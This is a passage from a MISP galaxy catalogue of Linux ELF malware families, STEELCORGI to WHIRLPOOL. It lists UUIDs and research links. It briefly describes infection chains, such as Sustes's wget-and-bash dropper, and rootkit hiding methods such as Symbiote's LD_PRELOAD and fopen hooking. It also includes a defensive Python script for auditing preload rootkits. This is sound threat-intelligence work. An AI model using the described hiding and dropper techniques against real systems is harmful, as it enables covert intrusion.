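The practical consequence for triage is that a sample of this type must be detonated with the victim's environment reproduced, or unpacked offline with the harvested values, rather than in a generic sandbox.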
Internal MISP references
UUID 21ff33b5-ef21-4263-8747-7de3d2dbdde6 which can be used as unique global reference for STEELCORGI in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.steelcorgi - webarchive
- https://yoroi.company/research/opening-steelcorgi-a-sophisticated-apt-swiss-army-knife/ - webarchive
- https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html - webarchive
- https://www.mandiant.com/resources/unc2891-overview - webarchive
- https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Sunless
Internal MISP references
UUID d03fa69b-53a4-4f61-b800-87e4246d2656 which can be used as unique global reference for Sunless in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
sustes miner
Sustes does not spread on its own (it is not a worm); it is delivered through exploitation and brute-force activity focused on IoT devices and Linux servers. The initial infection stage is a custom wget run directly on the victim machine, followed by a plain /bin/bash mr.sh. That script is a simple bash dropper that fetches and executes additional software.
Internal MISP references
UUID 5c117b01-826b-4656-b6ca-8b18b6e6159f which can be used as unique global reference for sustes miner in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Suterusu
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Suterusu.
| Known Synonyms |
|---|
| HCRootkit |
Internal MISP references
UUID d2748a0c-8739-4006-95c4-bdf6350d7fa9 which can be used as unique global reference for Suterusu in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Sword2033
Internal MISP references
UUID 9c1a32c7-45b4-4d3a-9d15-300b353f32a7 which can be used as unique global reference for Sword2033 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Symbiote
Malware that captures credentials and provides backdoor access, implemented as a userland rootkit (a shared object loaded into processes via LD_PRELOAD). It hides its network activity in three ways, by hooking and hijacking 1) fopen/fopen64, 2) eBPF, and 3) a set of libpcap functions.
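A preload-rootkit audit that sidesteps the fopen/fopen64 hook, added here as an example (not code from BlackBerry, Intezer or the malware): it reads /etc/ld.so.preload and /proc/<pid>/maps and environ with os.open/os.read, i.e. the open(2)/read(2) syscalls rather than stdio, so a hook on fopen in the audited process is not on the code path. That only helps against an fopen-level hook; a rootkit that also hooks open or read, or one inspecting the checker from the kernel, needs a statically linked checker or offline disk inspection instead. The trusted library directories are an assumption to tune per distro, and the sample maps, preload and environ data at the bottom are constructed.

```python
"""Preload-rootkit audit using raw syscalls instead of stdio (added example)."""
import os
import re
from typing import Dict, List, Mapping

# Assumption: where a legitimate shared object is expected to live on this distro.
TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", "/usr/local/lib/")


def read_raw(path: str) -> bytes:
    """Read a file with open(2)/read(2); no FILE*, so no fopen hook involved."""
    fd = os.open(path, os.O_RDONLY | os.O_CLOEXEC)
    chunks = []
    try:
        while True:
            buf = os.read(fd, 65536)
            if not buf:
                break
            chunks.append(buf)
    finally:
        os.close(fd)
    return b"".join(chunks)


def parse_preload(text: str) -> List[str]:
    """/etc/ld.so.preload: libraries separated by whitespace/newlines, '#' comments."""
    libs = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            libs.extend(line.split())
    return libs


def parse_environ(raw: bytes) -> Dict[str, str]:
    """/proc/<pid>/environ is NUL-separated KEY=VALUE records."""
    env = {}
    for rec in raw.split(b"\0"):
        if b"=" in rec:
            k, v = rec.split(b"=", 1)
            env[k.decode(errors="replace")] = v.decode(errors="replace")
    return env


def preload_from_env(env: Mapping[str, str]) -> List[str]:
    """LD_PRELOAD entries are separated by colons or spaces."""
    return [p for p in re.split(r"[:\s]+", env.get("LD_PRELOAD", "")) if p]


def mapped_files(maps_text: str) -> List[str]:
    """Distinct file-backed mappings from /proc/<pid>/maps, in order of appearance."""
    seen: List[str] = []
    for line in maps_text.splitlines():
        f = line.split(maxsplit=5)
        if len(f) == 6 and f[5].startswith("/") and f[5] not in seen:
            seen.append(f[5])
    return seen


def suspicious_libraries(maps_text: str) -> List[str]:
    """Shared objects loaded from outside the trusted directories, or whose
    backing file was deleted after being mapped (a dropped-then-removed .so)."""
    out = []
    for path in mapped_files(maps_text):
        deleted = path.endswith(" (deleted)")
        base = path[:-len(" (deleted)")] if deleted else path
        if ".so" in os.path.basename(base) and (deleted or not base.startswith(TRUSTED_LIB_DIRS)):
            out.append(path)
    return out


def audit(maps_text: str, preload_text: str, environ_raw: bytes) -> Dict[str, List[str]]:
    return {
        "ld_so_preload": parse_preload(preload_text),
        "ld_preload_env": preload_from_env(parse_environ(environ_raw)),
        "untrusted_mappings": suspicious_libraries(maps_text),
    }


def audit_live(pid: int) -> Dict[str, List[str]]:
    """Run the audit against a real process (needs permission to read its maps/environ)."""
    preload = ""
    if os.path.exists("/etc/ld.so.preload"):
        preload = read_raw("/etc/ld.so.preload").decode(errors="replace")
    return audit(read_raw(f"/proc/{pid}/maps").decode(errors="replace"),
                 preload, read_raw(f"/proc/{pid}/environ"))


# Constructed sample: a process with one object preloaded from /tmp and one
# library whose file was deleted after it was mapped.
SAMPLE_MAPS = """7f3c1a000000-7f3c1a1b0000 r-xp 00000000 fd:01 1310 /usr/lib/x86_64-linux-gnu/libc.so.6
7f3c1a400000-7f3c1a410000 r-xp 00000000 fd:01 9001 /usr/lib/libpcap.so.1
7f3c1a500000-7f3c1a50a000 r-xp 00000000 fd:01 9002 /tmp/.x/libx.so
7f3c1a600000-7f3c1a60a000 r-xp 00000000 fd:01 9003 /usr/lib/libz.so.1 (deleted)
7ffd2c000000-7ffd2c021000 rw-p 00000000 00:00 0 [stack]
"""
SAMPLE_PRELOAD = "/tmp/.x/libx.so   # constructed\n"
SAMPLE_ENVIRON = b"PATH=/usr/bin\0LD_PRELOAD=/tmp/.x/libx.so:/tmp/y.so\0HOME=/root\0"

if __name__ == "__main__":
    print(audit(SAMPLE_MAPS, SAMPLE_PRELOAD, SAMPLE_ENVIRON))
```

Because the rootkit filters what the hooked process sees, compare the result of audit_live() against the same files read from a rescue boot or the disk image; a non-empty /etc/ld.so.preload that the host's own tools show as empty is the tell.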
Internal MISP references
UUID 4339d876-768c-4cdf-941f-3f55a08aafca which can be used as unique global reference for Symbiote in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.symbiote - webarchive
- https://www.trendmicro.com/en_us/research/23/g/detecting-bpfdoor-backdoor-variants-abusing-bpf-filters.html - webarchive
- https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote/ - webarchive
- https://blogs.blackberry.com/en/2022/06/symbiote-a-new-nearly-impossible-to-detect-linux-threat - webarchive
- https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote - webarchive
- https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SysJoker (ELF)
Internal MISP references
UUID c4b681ec-f5b5-433a-9314-07e06f739ba2 which can be used as unique global reference for SysJoker (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.sysjoker - webarchive
- https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/ - webarchive
- https://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html - webarchive
- https://www.bleepingcomputer.com/news/security/new-sysjoker-backdoor-targets-windows-macos-and-linux/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Sysrv-hello (ELF)
Cryptojacking botnet.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sysrv-hello (ELF).
| Known Synonyms |
|---|
| Sysrv |
Internal MISP references
UUID d471083a-c8e1-4d9b-907e-685c9a75c1f9 which can be used as unique global reference for Sysrv-hello (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.sysrvhello - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf - webarchive
- https://dfir.ch/posts/sysrv/ - webarchive
- https://www.riskiq.com/blog/external-threat-management/sysrv-hello-cryptojacking-botnet/ - webarchive
- https://darktrace.com/blog/worm-like-propagation-of-sysrv-hello-crypto-jacking-botnet - webarchive
- https://www.lacework.com/sysrv-hello-expands-infrastructure/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SystemBC (ELF)
Internal MISP references
UUID 20de6d31-634d-4723-959d-4ced5bb03dc5 which can be used as unique global reference for SystemBC (ELF) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
TeamTNT
TeamTNT, active since fall 2019, is a well-known threat actor that targets *nix-based systems and misconfigured Docker container environments. It has constantly evolved its capabilities for cloud-based cryptojacking operations and has shifted its focus to compromising Kubernetes clusters.
Internal MISP references
UUID 24695f84-d3af-477e-92dd-c05c9536ebf5 which can be used as unique global reference for TeamTNT in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt - webarchive
- https://cybersecurity.att.com/blogs/labs-research/teamtnt-delivers-malware-with-new-detection-evasion-tool - webarchive
- https://sysdig.com/blog/teamtnt-aws-credentials/ - webarchive
- https://www.aquasec.com/blog/teamtnt-reemerged-with-new-aggressive-cloud-campaign/ - webarchive
- https://www.cadosecurity.com/2020/08/17/teamtnt-the-first-crypto-mining-worm-to-steal-aws-credentials/ - webarchive
- https://www.intezer.com/blog/malware-analysis/teamtnt-cryptomining-explosion/ - webarchive
- https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf - webarchive
- https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://www.uptycs.com/blog/team-tnt-deploys-malicious-docker-image-on-docker-hub-with-pentesting-tools - webarchive
- https://www.anomali.com/blog/inside-teamtnts-impressive-arsenal-a-look-into-a-teamtnt-server - webarchive
- https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment - webarchive
- https://www.aquasec.com/blog/threat-alert-anatomy-of-silentbobs-cloud-attack/ - webarchive
- https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/ - webarchive
- https://www.aquasec.com/blog/container-attacks-on-redis-servers/ - webarchive
- https://www.aquasec.com/blog/container-security-tnt-container-attack/ - webarchive
- https://www.trendmicro.com/en_ae/research/21/k/teamtnt-upgrades-arsenal-refines-focus-on-kubernetes-and-gpu-env.html - webarchive
- https://www.group-ib.com/blog/teamtnt/ - webarchive
- https://www.cadosecurity.com/post/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials - webarchive
- https://www.aquasec.com/blog/fileless-malware-container-security/ - webarchive
- https://tolisec.com/active-crypto-mining-operation-by-teamtnt/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/adept-libra/ - webarchive
- https://www.trendmicro.com/en_us/research/21/l/more-tools-in-the-arsenal-how-teamtnt-used-compromised-docker-hu.html - webarchive
- https://www.lacework.com/teamtnt-builds-botnet-from-chinese-cloud-servers/ - webarchive
- https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf - webarchive
- https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf - webarchive
- https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/thieflibra/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
TheMoon
Internal MISP references
UUID ed098719-797b-4cb3-a73c-65b6d08ebdfa which can be used as unique global reference for TheMoon in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.themoon - webarchive
- https://www.fortinet.com/blog/threat-research/themoon-a-p2p-botnet-targeting-home-routers - webarchive
- https://www.justice.gov/usao-ndok/pr/botnet-dismantled-international-operation-russian-and-kazakhstani-administrators - webarchive
- https://blog.lumen.com/the-darkside-of-themoon - webarchive
- https://www.ic3.gov/CSA/2025/250507.pdf - webarchive
- https://blog.lumen.com/a-new-phase-of-themoon/ - webarchive
- https://www.sans.org/reading-room/whitepapers/malicious/analyzing-backdoor-bot-mips-platform-35902 - webarchive
- https://s3.documentcloud.org/documents/25935130/anyproxy-and-5socks-indictment.pdf - webarchive
- https://www.ic3.gov/PSA/2025/PSA250507 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
TNTbotinger
Internal MISP references
UUID 00319b53-e31c-4623-a3ac-9a18bc52bf36 which can be used as unique global reference for TNTbotinger in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Torii
Internal MISP references
UUID a874575e-0ad7-464d-abb6-8f4b7964aa92 which can be used as unique global reference for Torii in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
TripleCross
According to its author, TripleCross is a Linux eBPF rootkit that demonstrates the offensive capabilities of the eBPF technology.
Internal MISP references
UUID a462c60d-a7f9-4a05-aaa1-be415870310e which can be used as unique global reference for TripleCross in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Trump Bot
Internal MISP references
UUID feb6a5f6-32f9-447d-af9c-08e499457883 which can be used as unique global reference for Trump Bot in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
TSCookie
Internal MISP references
UUID 592f7cc6-1e07-4d83-8082-aef027e9f1e2 which can be used as unique global reference for TSCookie in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.tscookie - webarchive
- https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko - webarchive
- https://jp.security.ntt/resources/EN-BlackTech_2021.pdf - webarchive
- https://twitter.com/ESETresearch/status/1382054011264700416 - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf - webarchive
- https://www.macnica.net/file/mpressioncss_ta_report_2019_4.pdf - webarchive
- https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape - webarchive
- https://blogs.jpcert.or.jp/en/2020/03/elf-tscookie.html - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
- https://www.macnica.net/pdf/mpressioncss_ta_report_2019_4_en.pdf - webarchive
- https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
tsh
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular tsh.
| Known Synonyms |
|---|
| TINYSHELL |
Internal MISP references
UUID 95a07de2-0e17-48a7-b935-0c1c0c0e39af which can be used as unique global reference for tsh in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsh - webarchive
- https://supportportal.juniper.net/sfc/servlet.shepherd/document/download/069Dp00000FzdmIIAR?operationContext=S1 - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers/ - webarchive
- https://github.com/creaktive/tsh - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Tsunami (ELF)
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Tsunami (ELF).
| Known Synonyms |
|---|
| Amnesia |
| Muhstik |
| Radiation |
Internal MISP references
UUID 21540126-d0bb-42ce-9b93-341fedb94cac which can be used as unique global reference for Tsunami (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami - webarchive
- https://asec.ahnlab.com/en/54647/ - webarchive
- https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/ - webarchive
- https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/ - webarchive
- https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775 - webarchive
- https://sysdig.com/blog/muhstik-malware-botnet-analysis/ - webarchive
- http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/ - webarchive
- https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039 - webarchive
- https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/ - webarchive
- https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure - webarchive
- https://www.fortinet.com/blog/threat-research/recent-attack-uses-vulnerability-on-confluence-server - webarchive
- https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/ - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
- https://blog.aquasec.com/fileless-malware-container-security - webarchive
- https://blog.aquasec.com/new-malware-in-the-cloud-by-teamtnt - webarchive
- https://tolisec.com/multi-vector-minertsunami-botnet-with-ssh-lateral-movement/ - webarchive
- https://www.aquasec.com/blog/threat-alert-anatomy-of-silentbobs-cloud-attack/ - webarchive
- https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/ - webarchive
- http://get.cyberx-labs.com/radiation-report - webarchive
- https://www.aquasec.com/blog/container-security-tnt-container-attack/ - webarchive
- https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/ - webarchive
- https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/ - webarchive
- https://www.lacework.com/meet-muhstik-iot-botnet-infecting-cloud-servers/ - webarchive
- https://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134 - webarchive
- https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers - webarchive
- https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks - webarchive
- https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Turla RAT
Internal MISP references
UUID 1b62a421-c0db-4425-bcb2-a4925d5d33e0 which can be used as unique global reference for Turla RAT in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.turla_rat - webarchive
- https://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html - webarchive
- https://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html - webarchive
- https://cocomelonc.github.io/linux/2024/11/22/linux-hacking-3.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Umbreon
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Umbreon.
| Known Synonyms |
|---|
| Espeon |
Internal MISP references
UUID 637000f7-4363-44e0-b795-9cfb7a3dc460 which can be used as unique global reference for Umbreon in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.umbreon - webarchive
- http://contagiodump.blogspot.com/2018/03/rootkit-umbreon-umreon-x86-arm-samples.html - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Unidentified Linux 001
According to Cybereason, these scripts have been used in an ongoing campaign exploiting a widespread vulnerability in the Exim MTA, CVE-2019-10149. The attack leverages this week-old vulnerability to gain remote command execution on the target machine, searches the Internet for other machines to infect, and starts a cryptocurrency miner.
Internal MISP references
UUID b5b59d9f-f9e2-4201-a017-f2bae0470808 which can be used as unique global reference for Unidentified Linux 001 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Unidentified ELF 004
Implant used by APT31 on compromised SOHO infrastructure, tries to camouflage as a tool ("unifi-video") related to Ubiquiti UniFi surveillance cameras.
Internal MISP references
UUID 44a57915-2ec0-476f-9f20-b11082f5b5a4 which can be used as unique global reference for Unidentified ELF 004 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Unidentified 005 (Sidecopy)
Internal MISP references
UUID d49402b3-9f2a-4d9a-ae09-b1509da2e8fd which can be used as unique global reference for Unidentified 005 (Sidecopy) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Unidentified ELF 006 (Tox Backdoor)
Enables remote execution of scripts on a host and communicates via Tox.
Internal MISP references
UUID 61a36688-0a4f-4899-8b17-ca0d5ff7e800 which can be used as unique global reference for Unidentified ELF 006 (Tox Backdoor) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Hive (Vault 8)
Internal MISP references
UUID 721fa6d1-da73-4dd4-9154-a60ff4607467 which can be used as unique global reference for Hive (Vault 8) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Vermilion Strike (ELF)
Internal MISP references
UUID a4ded098-be7b-4852-adfd-8971ace583f1 which can be used as unique global reference for Vermilion Strike (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.vermilion_strike - webarchive
- https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/ - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf - webarchive
- https://notes.netbytesec.com/2021/09/discovering-linux-elf-beacon-of-cobalt_18.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
vGet
According to Synacktiv, vGet is an in-memory stager for vShell, written in Rust.
Internal MISP references
UUID 4bf5cdc7-5b74-4d05-852b-3b2a24779cd3 which can be used as unique global reference for vGet in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
VPNFilter
Internal MISP references
UUID 5ad30da2-2645-4893-acd9-3f8e0fbb5500 which can be used as unique global reference for VPNFilter in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.vpnfilter - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/vpnfilter-affected-devices-still-riddled-with-19-vulnerabilities - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-054A%20New%20Sandworm%20Malware%20Cyclops%20Blink%20Replaces%20VPN%20Filter.pdf - webarchive
- https://blog.talosintelligence.com/2019/05/one-year-later-vpnfilter-catastrophe.html - webarchive
- https://blog.talosintelligence.com/2018/09/vpnfilter-part-3.html - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-110a - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf - webarchive
- https://www.sentinelone.com/labs/acidrain-a-modem-wiper-rains-down-on-europe/ - webarchive
- https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks - webarchive
- https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware - webarchive
- https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf - webarchive
- https://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/ - webarchive
- https://blog.talosintelligence.com/2022/02/current-executive-guidance-for-ongoing.html - webarchive
- https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-VPN-Filter-analysis-v2.pdf?la=en - webarchive
- https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/ - webarchive
- https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected - webarchive
- https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games - webarchive
- https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/ - webarchive
- https://i.blackhat.com/USA-19/Thursday/us-19-Doerr-The-Enemy-Within-Modern-Supply-Chain-Attacks.pdf - webarchive
- https://services.google.com/fh/files/misc/apt44-unearthing-sandworm.pdf - webarchive
- https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter - webarchive
- https://blog.talosintelligence.com/2022/02/threat-advisory-cyclops-blink.html - webarchive
- https://blog.talosintelligence.com/2018/05/VPNFilter.html - webarchive
- https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1 - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-054a - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
WatchBog
According to Intezer, this is a spreader module used by WatchBog. It is a dynamically linked ELF executable, compiled with Cython. C&C addresses are fetched from Pastebin, and C&C communication references unique identification keys per victim. It contains a BlueKeep scanner that reports positively scanned hosts to the C&C server (RC4 encrypted within SSL/TLS). It contains five exploits targeting Jira, Exim, Solr, Jenkins and Nexus Repository Manager 3.
Internal MISP references
UUID aa00d8c9-b479-4d05-9887-cd172a11cfc9 which can be used as unique global reference for WatchBog in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
WellMail
Internal MISP references
UUID 93ffafbd-a8af-4164-b3ab-9b21e6d09232 which can be used as unique global reference for WellMail in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmail - webarchive
- https://blog.talosintelligence.com/2020/08/attribution-puzzle.html - webarchive
- https://securelist.com/apt-trends-report-q3-2020/99204/ - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmail.html - webarchive
- https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors - webarchive
- https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
elf.wellmess
Internal MISP references
UUID b0046a6e-3b8b-45ad-a357-dabc46aba7de which can be used as unique global reference for elf.wellmess in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmess - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html - webarchive
- https://blog.talosintelligence.com/2020/08/attribution-puzzle.html - webarchive
- https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/ - webarchive
- https://community.riskiq.com/article/541a465f/description - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf - webarchive
- https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf - webarchive
- https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf - webarchive
- https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf - webarchive
- https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa21-116a - webarchive
- https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937/ - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf - webarchive
- https://services.global.ntt/en-us/insights/blog/the-layered-infrastructure-operated-by-apt29 - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
WHIRLPOOL
Internal MISP references
